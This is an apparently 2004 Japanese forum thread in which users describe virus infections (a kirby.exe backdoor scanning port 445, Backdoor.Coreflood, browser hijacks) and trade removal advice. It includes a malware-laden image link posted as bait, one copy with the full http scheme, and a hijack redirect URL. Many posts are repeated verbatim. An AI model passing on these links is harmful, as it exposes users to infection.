できれば仕事用のパソコンとネットなどをする用のパソコンで分ければいいと思います。
重要な書類が消えるってのはバックアップとればなんとかなります。
情報を流出する可能性のあるウイルスなどのためにもそうしたほうがいいです。
情報が流出した場合にはあなたに責任が降りかかってくるかもしれませんから。
907 :名無しさん@お腹いっぱい。:04/10/01 07:13:13
nycopを思い出すなぁ・・・
908 :905:04/10/01 07:52:11
>>906
そうですか、よかった
そうですか、よかった
909 :名無しさん@お腹いっぱい。:04/10/01 09:36:13
>>905
重要なデータの入っているPCで2chに貼られているリンクをホイホイ
踏むあなたのセキュリティホールを埋める方が重要。
セキュリティソフト入れていても、新種亜種には無力です。
セキュリティを強化しても、中の人がざるなら意味無し。
重要なデータの入っているPCで2chに貼られているリンクをホイホイ
踏むあなたのセキュリティホールを埋める方が重要。
セキュリティソフト入れていても、新種亜種には無力です。
セキュリティを強化しても、中の人がざるなら意味無し。
910 :870:04/10/01 10:09:31
>>910
良かったな!次はアンチウイルスソフトの導入だ!!
こんなのとか↓
【ソースネクスト】ウイルスセキュリティ2005 Part9【K7】
http://pc5.2ch.net/test/read.cgi/sec/1095983778/l50
良かったな!次はアンチウイルスソフトの導入だ!!
こんなのとか↓
【ソースネクスト】ウイルスセキュリティ2005 Part9【K7】
http://pc5.2ch.net/test/read.cgi/sec/1095983778/l50
912 :名無しさん@お腹いっぱい。:04/10/01 13:27:18
913 :名無しさん@お腹いっぱい。:04/10/01 14:02:21
>>911
をいっw
をいっw
914 :名無しさん@お腹いっぱい。:04/10/01 14:02:30
すみません、誤ってこれ踏んでしまったのですがノートンがトロイを発見しました。
そのメッセージが出た以外はインストール画面でOKとかはせずに電源を切りました。
これは感染してしまったのでしょうか?今ノートンでスキャンしてますがこれで検出されなければ問題ないですか?
そのメッセージが出た以外はインストール画面でOKとかはせずに電源を切りました。
これは感染してしまったのでしょうか?今ノートンでスキャンしてますがこれで検出されなければ問題ないですか?
915 :名無しさん@お腹いっぱい。:04/10/01 14:04:38
張り忘れました。誤って踏んでしまったのはこれです。(踏まないでください!)
ttp://with2ch.net/cgi-bin/eat/img-box/img20040825044933.jpg
ttp://with2ch.net/cgi-bin/eat/img-box/img20040825044933.jpg
916 :名無しさん@お腹いっぱい。:04/10/01 14:35:51
踏まないでください、つうならtまで抜けよ(゚Д゚)ゴルァ!!
917 :名無しさん@お腹いっぱい。:04/10/01 14:38:53
918 :名無しさん@お腹いっぱい。:04/10/01 14:56:46
919 :名無しさん@お腹いっぱい。:04/10/01 15:03:23
920 :名無しさん@お腹いっぱい。:04/10/01 19:03:27
質問者も回答者もカスばかり
921 :名無しさん@お腹いっぱい。:04/10/01 21:34:36
911
はどういうもの?
怖く踏めないけど、予防のために内容を知りたい。
はどういうもの?
怖く踏めないけど、予防のために内容を知りたい。
922 :名無しさん@お腹いっぱい。:04/10/01 21:37:10
923 :名無しさん@お腹いっぱい。:04/10/01 21:56:39
924 :名無しさん@お腹いっぱい。:04/10/01 22:14:20
つかアドレスからして2ch内のスレだとわかるものが踏めないとはどういうことだ?
925 :名無しさん@お腹いっぱい。:04/10/01 22:15:38
(((((((( ;゚Д゚)))))))ガクガクブルブルガタガタブルガタガクガクガクガクガク
926 :名無しさん@お腹いっぱい。:04/10/01 23:33:58
ウイルスとかもそうだけどセキュリティホールがあってもそれを
守るOSレベルでOSと連動するようなセキュリティソフトないの?
守るOSレベルでOSと連動するようなセキュリティソフトないの?
927 :kirby???:04/10/02 00:07:39
なんつか、新種ウイルスって出た?
C:\直下にkirby.exeってできるん。そんで、HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
に名前service 値C:\kirby.exeの値設定されるん。
んで、ネットワークに接続確立してからすぐnetstat /nしてみると宛先ポート445で物凄い勢いでなんかパケット送ってるん。
宛先IPアドレスは、ランダムっぽいけど多分連番でスキャヌしてる雰囲気。
DELODERみたく、SMB使って脆弱パスワド試してるんか、SASSERみたくLSASS の脆弱性突いてるんかわからん。
kirby.exeのサイズは25KB
プロセス殺して、レヂストリ値消して、kirby.exe削除して再起動しるとネット繋ぐまでは何とも無いが、
ネット繋いだとたんまたC:\にカービィ.exe出来るん。
ノートンでkirby.exeスキャヌしてみると検出はするけど名前Backdoor.Trojanとしか出て来ないん。
知人の買ったばかりPCの設定いぢってて、あんまり調子悪いから調べてみたらこんなん出ました。。。
メール送受信の設定どう考えても上手くいかなくて小一時間三十分悩んだん。。。
OSはXPホームでSP1。後は知らん。ログインパスワドたぶん無し。アンチVIRは何も無いん。
・・・・だから初心者買ったばかりXPいぢるの嫌なんぢゃ〜!!
新種で流行しそうだったら誰か新スレ立ててねん。
C:\直下にkirby.exeってできるん。そんで、HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
に名前service 値C:\kirby.exeの値設定されるん。
んで、ネットワークに接続確立してからすぐnetstat /nしてみると宛先ポート445で物凄い勢いでなんかパケット送ってるん。
宛先IPアドレスは、ランダムっぽいけど多分連番でスキャヌしてる雰囲気。
DELODERみたく、SMB使って脆弱パスワド試してるんか、SASSERみたくLSASS の脆弱性突いてるんかわからん。
kirby.exeのサイズは25KB
プロセス殺して、レヂストリ値消して、kirby.exe削除して再起動しるとネット繋ぐまでは何とも無いが、
ネット繋いだとたんまたC:\にカービィ.exe出来るん。
ノートンでkirby.exeスキャヌしてみると検出はするけど名前Backdoor.Trojanとしか出て来ないん。
知人の買ったばかりPCの設定いぢってて、あんまり調子悪いから調べてみたらこんなん出ました。。。
メール送受信の設定どう考えても上手くいかなくて小一時間三十分悩んだん。。。
OSはXPホームでSP1。後は知らん。ログインパスワドたぶん無し。アンチVIRは何も無いん。
・・・・だから初心者買ったばかりXPいぢるの嫌なんぢゃ〜!!
新種で流行しそうだったら誰か新スレ立ててねん。
ぁ、ちなみにノトンの定義ファイルは最新だよん。
929 :名無しさん@お腹いっぱい。:04/10/02 00:43:15
930 :名無しさん@お腹いっぱい。:04/10/02 00:43:49
931 :名無しさん@お腹いっぱい。:04/10/02 00:45:07
>>927
トレンドマイクロのオンラインスキャンではどう出るの?
トレンドマイクロのオンラインスキャンではどう出るの?
ぁぁ、アンテドート簡易版だと
TrojanProxy.Win32.Agent.bjと出まつねん。
TrojanProxy.Win32.Agent.bjと出まつねん。
934 :名無しさん@お腹いっぱい。:04/10/02 01:50:19
936 :名無しさん@お腹いっぱい。:04/10/02 09:59:01
937 :名無しさん@お腹いっぱい。:04/10/02 10:19:53
知人から「ウィルス感染したようなのでPCを見てほしい」とだけ頼まれて、
いま下調べしてる者です。
OSはおそらくXPで、症状は「なんど起動してもOSが強制終了になる」とだけ
聞いています。強制終了前にカウントダウンがあるか、どんなメッセージが
出るかまでは聞きそびれてしまいました。
SasserまたはBlasterの関連かと予想してはいるのですが、
カウントダウンなしにOSが急に落ちるような(上記とは別のタイプの?)ウィルス
情報はあがってますか? どうぞお願いします。
いま下調べしてる者です。
OSはおそらくXPで、症状は「なんど起動してもOSが強制終了になる」とだけ
聞いています。強制終了前にカウントダウンがあるか、どんなメッセージが
出るかまでは聞きそびれてしまいました。
SasserまたはBlasterの関連かと予想してはいるのですが、
カウントダウンなしにOSが急に落ちるような(上記とは別のタイプの?)ウィルス
情報はあがってますか? どうぞお願いします。
938 :名無しさん@お腹いっぱい。:04/10/02 10:24:15
939 :名無しさん@お腹いっぱい。:04/10/02 10:28:43
即レス!どうもです。
そうですね。今日みにいく予定ですので、まずはOLスキャンをしてみる
つもりです。ありがとうございます。
ただ、急にOSが落とされるようなタイプだとスキャン中に往生してしまうかな
などと思いまして。。。 追加情報ありましたらおながいします
そうですね。今日みにいく予定ですので、まずはOLスキャンをしてみる
つもりです。ありがとうございます。
ただ、急にOSが落とされるようなタイプだとスキャン中に往生してしまうかな
などと思いまして。。。 追加情報ありましたらおながいします
940 :名無しさん@お腹いっぱい。:04/10/02 10:37:32
追加情報じゃなくてスマソですが、何にせよWindows Updateなんかのセキュ対策教えたり
アンチウィルス買わせなきゃダメっすね
甘やかしたらこの先ずっとお助けマンとしてこき使われますぞ
アンチウィルス買わせなきゃダメっすね
甘やかしたらこの先ずっとお助けマンとしてこき使われますぞ
941 :名無しさん@お腹いっぱい。:04/10/02 10:51:38
>急にOSが落とされるようなタイプだとスキャン中に往生してしまうかな
トレンドマイクロ ダメージクリーンナップサービス
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=4700
これ入れたFDなど用意してはいかがでしょうか。
トレンドマイクロ ダメージクリーンナップサービス
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=4700
これ入れたFDなど用意してはいかがでしょうか。
942 :名無しさん@お腹いっぱい。:04/10/02 11:13:40
>941
それはいいかもしれませんな。SasserやBlasterの活動だって一時的に
止められますからな。
本格的な駆除は別途実施しなくちゃいかんですがな。
それはいいかもしれませんな。SasserやBlasterの活動だって一時的に
止められますからな。
本格的な駆除は別途実施しなくちゃいかんですがな。
943 :名無しさん@お腹いっぱい。:04/10/02 11:17:36
代理質問は効率が悪いので本人を降臨させろ
944 :名無しさん@お腹いっぱい。:04/10/02 11:21:18
そんなに無防備なPCだと他にもスパイウエアとかイパーイ仕込まれてそうな悪寒
>>937の週末がこれで潰れなきゃEが(((((((( ;゚Д゚)))))))
>>937の週末がこれで潰れなきゃEが(((((((( ;゚Д゚)))))))
946 :名無しさん@お腹いっぱい。:04/10/02 12:47:19
947 :名無しさん@お腹いっぱい。:04/10/02 16:38:22
知人と言う奴は大抵本人が感染してる
948 :ヘッポコ初心者:04/10/02 18:50:50
ノートンインターネットセキュリティ2004
をいれています。
Backdoor.Coreflood が発見され、削除しようとしても
削除されないのですがどうすればよいのでしょうか?
教えてください
をいれています。
Backdoor.Coreflood が発見され、削除しようとしても
削除されないのですがどうすればよいのでしょうか?
教えてください
949 :名無しさん@お腹いっぱい。:04/10/02 18:50:53
>>939
知人のPCはどうでもいいが、OLスキャンの結果報告はしてほしいな
知人のPCはどうでもいいが、OLスキャンの結果報告はしてほしいな
950 :名無しさん@お腹いっぱい。:04/10/02 18:51:50
951 :ヘッポコ初心者:04/10/02 18:57:35
すみません、もう少し詳しく教えてください
952 :名無しさん@お腹いっぱい。:04/10/02 19:02:14
>>951
PestPatrolを導入したらどうかな?
私の友人が同様にバックドア系に感染し困っていたのだが・・
PestPatrolで簡単に駆除できました。
餅は餅屋でがよろいしかとおもいます。
統合型ツールの導入は安い反面、防衛力に少し難があるのではないかな?
PestPatrolを導入したらどうかな?
私の友人が同様にバックドア系に感染し困っていたのだが・・
PestPatrolで簡単に駆除できました。
餅は餅屋でがよろいしかとおもいます。
統合型ツールの導入は安い反面、防衛力に少し難があるのではないかな?
953 :名無しさん@お腹いっぱい。:04/10/02 19:07:15
>>952
社員乙
社員乙
954 :ヘッポコ初心者:04/10/02 19:14:32
952さんお返事ありがとうございます。
初心者で感染も始めてで、よくわからないのですが、
どのような事に気を付ければ防げるのでしょうか?
初心者で感染も始めてで、よくわからないのですが、
どのような事に気を付ければ防げるのでしょうか?
955 :名無しさん@お腹いっぱい。:04/10/02 19:27:05
>>954
初心者初心者言って調べる気がないなら
セキュリティ初心者質問スレッドpart47
http://pc5.2ch.net/test/read.cgi/sec/1095637802/
こっち行け
初心者初心者言って調べる気がないなら
セキュリティ初心者質問スレッドpart47
http://pc5.2ch.net/test/read.cgi/sec/1095637802/
こっち行け
956 :名無しさん@お腹いっぱい。:04/10/02 19:50:49
戻ってきました。
>>947 本人じゃなーい。
自分はAVG,Spybot,Ad-awareの3本セットでふんばってるんじゃ。
…実は当人、ノートン先生を「持っていた」ようで、auto_tscでウィルス活動を
とめ、OLスキャン→先生インストール→退治 と成功しました。
出てきたのはもろもろ100匹ほどで、想像したほど多くなかったのは
Windows Updateだけはやっていたからでしょうか。
Sasserの中の人みたいのはいましたが、それが主因だったかどうかは
不明です。
いろいろお世話になりました。依頼主が女の子でないのがあれですが。
>>947 本人じゃなーい。
自分はAVG,Spybot,Ad-awareの3本セットでふんばってるんじゃ。
…実は当人、ノートン先生を「持っていた」ようで、auto_tscでウィルス活動を
とめ、OLスキャン→先生インストール→退治 と成功しました。
出てきたのはもろもろ100匹ほどで、想像したほど多くなかったのは
Windows Updateだけはやっていたからでしょうか。
Sasserの中の人みたいのはいましたが、それが主因だったかどうかは
不明です。
いろいろお世話になりました。依頼主が女の子でないのがあれですが。
958 :名無しさん@お腹いっぱい。:04/10/02 22:40:28
>>957はお礼にやらないか?と言われてやってきた模様です
959 :名無しさん@お腹いっぱい。:04/10/02 22:43:02
ウイルス感染してレジストリが変更され
ウイルスを消してレジストリが変更されたままになっている時に
オンラインスキャンした場合、ひっかかるのですか?
ウイルスを消してレジストリが変更されたままになっている時に
オンラインスキャンした場合、ひっかかるのですか?
960 :名無しさん@お腹いっぱい。:04/10/02 22:45:07
>>959
マルチ
マルチ
962 :名無しさん@お腹いっぱい。:04/10/02 22:59:26
>>959
レジストリ検索するスキャンなら引っかかるのでは?
レジストリ検索するスキャンなら引っかかるのでは?
964 :名無しさん@お腹いっぱい。:04/10/02 23:21:12
てか、オンラインスキャンでレジストリまでスキャンされるなんて(ry
965 :名無しさん@お腹いっぱい。:04/10/03 00:52:35
>>961
download板にカエレ
download板にカエレ
966 :名無しさん@お腹いっぱい。:04/10/03 08:55:38
HTML_REDIR.Aのファイル名ぉιぇτ
967 :名無しさん@お腹いっぱい。:04/10/03 09:41:06
HTML_REDIR.A
968 :名無しさん@お腹いっぱい。:04/10/03 12:41:22
決まったファイル名などない
969 :名無しさん@お腹いっぱい。:04/10/03 16:08:23
970 :名無しさん@お腹いっぱい。:04/10/03 18:04:12
777 :名無しステーション :04/10/03 17:36:40 ID:6SIqEWMR
http://with2ch.net/cgi-bin/eat/img-box/img20040825044933.jpg
和田のホームラン
実況板で釣られてウィルスにやられた・・・_| ̄|○
IEでHPなどを開こうとすると必ず変なページに行かされるのだが、対処法がわからん。
ウィスルソフトでも駆除できないので困っています^^;
http://with2ch.net/cgi-bin/eat/img-box/img20040825044933.jpg
和田のホームラン
実況板で釣られてウィルスにやられた・・・_| ̄|○
IEでHPなどを開こうとすると必ず変なページに行かされるのだが、対処法がわからん。
ウィスルソフトでも駆除できないので困っています^^;
971 :名無しさん@お腹いっぱい。:04/10/03 18:07:54
972 :名無しさん@お腹いっぱい。:04/10/03 18:08:51
973 :名無しさん@お腹いっぱい。:04/10/03 18:24:44
>>970
PestPatrolを導入すれば直るね。
PestPatrolを導入すれば直るね。
974 :名無しさん@お腹いっぱい。:04/10/03 18:27:36
975 :名無しさん@お腹いっぱい。:04/10/03 18:28:00
976 :名無しさん@お腹いっぱい。:04/10/03 18:28:50
>>972
通報しました
通報しました
977 :名無しさん@お腹いっぱい。:04/10/03 18:46:12
978 :名無しさん@お腹いっぱい。:04/10/03 19:20:45
979 :名無しさん@お腹いっぱい。:04/10/03 19:59:58
なんかネットに繋ぐとIEが自動的に
ttp://www.superlawntrucks.com/T.html
ってページ開くようになってしまったんですがこれウイルス?
いつのまにかTT.exeなるアプリケーションがマイコンピュータ内にあるしorz
ttp://www.superlawntrucks.com/T.html
ってページ開くようになってしまったんですがこれウイルス?
いつのまにかTT.exeなるアプリケーションがマイコンピュータ内にあるしorz
980 :名無しさん@お腹いっぱい。:04/10/03 20:44:17
981 :名無しさん@お腹いっぱい。:04/10/03 20:45:55
982 :名無しさん@お腹いっぱい。:04/10/03 20:46:56
>>979
エロイ
エロイ
983 :名無しさん@お腹いっぱい。:04/10/03 21:16:40
>>979
テンプレ読んで実行後質問
じゃなきゃ糞カスフンて言われる
エロサイト見たら…助けて下さい!Part41
http://pc6.2ch.net/test/read.cgi/pcqa/1095834281/
テンプレ読んで実行後質問
じゃなきゃ糞カスフンて言われる
エロサイト見たら…助けて下さい!Part41
http://pc6.2ch.net/test/read.cgi/pcqa/1095834281/
984 :名無しさん@お腹いっぱい。:04/10/04 06:30:10
うむ。
985 :名無しさん@お腹いっぱい。:04/10/04 21:10:11
ていうか
親孝行>>>>マザコン
だな。親を気遣うだけでマザコンと呼ばれる最近の風潮はどうかと・・・・
親孝行>>>>マザコン
だな。親を気遣うだけでマザコンと呼ばれる最近の風潮はどうかと・・・・
986 :名無しさん@お腹いっぱい。:04/10/04 21:16:15
そろそろ次スレお願いしマツ。
987 :名無しさん@お腹いっぱい。:04/10/04 21:27:20
988 :名無しさん@お腹いっぱい。:04/10/05 00:11:13
早めに流して次に移行した方がよさげかな
989 :名無しさん@お腹いっぱい。:04/10/06 01:03:16
キンタマウイルスの削除方法がわからないのですが・・・。
ttp://www.geocities.jp/ichigo_kintama/ ここ見たけれどあまりわかりません
OSはMEです、どなたか教えて下さいまし_| ̄|○
ttp://www.geocities.jp/ichigo_kintama/ ここ見たけれどあまりわかりません
OSはMEです、どなたか教えて下さいまし_| ̄|○
990 :名無しさん@お腹いっぱい。:04/10/06 01:22:49
991 :名無しさん@お腹いっぱい。:04/10/06 02:39:25
>>989
ny利用者板違い
ny利用者板違い
OLスキャン・・・・エヘヘヘヘ